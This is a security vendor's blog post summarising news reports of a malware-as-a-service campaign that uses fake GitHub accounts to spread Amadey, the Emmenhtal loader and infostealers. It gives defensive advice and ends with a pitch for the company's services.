A new Malware-as-a-Service (MaaS) operation is exploiting GitHub repositories to distribute malicious payloads, including Amadey malware and various data stealers. This sophisticated tactic allows threat actors to bypass traditional security filters by leveraging GitHub's trusted domain, making it a significant concern for cybersecurity professionals and users alike.

GitHub Becomes a Malware Distribution Hub

Cybercriminals are increasingly abusing legitimate platforms like GitHub to host and distribute malware. This MaaS operation utilizes fake GitHub accounts to store malicious scripts, tools, and Amadey plugins. By disguising these payloads as benign software or updates within seemingly legitimate repositories, attackers can circumvent network security measures that typically block suspicious downloads.

The Mechanics of Deception

The operation employs a multi-stage infection process, often beginning with the Emmenhtal loader (also known as PEAKLIGHT). This loader, designed with multiple layers of obfuscation, delivers Amadey malware, which then downloads additional payloads from the compromised GitHub repositories. These secondary payloads include notorious information stealers such as Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer, as well as remote access trojans like AsyncRAT.

• Key Takeaways:Threat actors are using fake GitHub accounts (e.g., Legendary99999, DFfe9ewf, Milidmdds) to host malware.The Emmenhtal loader is a primary vector, delivering Amadey and other infostealers.Malware is often disguised as legitimate software or updates within GitHub repositories.The use of GitHub's trusted domain helps bypass web filtering and security controls.The MaaS model democratizes cybercrime, enabling less skilled actors to launch sophisticated attacks.

Evolving Threats and Defense Strategies

This MaaS operation highlights a growing trend where cybercriminals repurpose legitimate services for malicious ends. The ability to host malware on a widely trusted platform like GitHub poses a significant challenge for traditional security measures. The attack chains often involve Base64-encoded scripts that evade initial detection and activate through trusted Windows processes.

To counter these evolving threats, cybersecurity experts recommend several defense strategies:

• Enhanced Scrutiny: Users and organizations should meticulously scrutinize repository metadata, including commit histories and contributor profiles, before downloading any files.

• Stricter Network Policies: Implement robust network policies, such as whitelisting approved GitHub sources and employing behavioral analysis tools to detect anomalous executions post-download.

• Continuous Monitoring: Organizations must prioritize behavioral analysis and incorporate real-time monitoring mechanisms to effectively identify and respond to these threats.

• User Education: Educate users about the risks associated with downloading files from unverified sources, even on seemingly legitimate platforms.

GitHub has been actively taking down reported malicious accounts, but the persistent nature of these campaigns underscores the need for ongoing vigilance and collaborative efforts between platforms, security firms, and users to fortify digital defenses.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

• New Malware-as-a-Service Operation Abuses GitHub Repositories to Deploy Infostealers Like Lumma andAmadey, WebProNews.

• Hackers Use GitHub Repositories to Host Amadey Malware and Data Stealers, Bypassing Filters, The Hacker News.

• MaaS Operation Uses GitHub to Host Loaders and Malware, TechNadu.

• Threat Actors Exploit GitHub Accounts to Host Payloads, Tools, and Amadey Malware Plugins, GBHackers News.

• Threat Actors Weaponizing GitHub Accounts To Host Payloads, Tools and Amadey Malware Plug-Ins, CyberSecurityNews.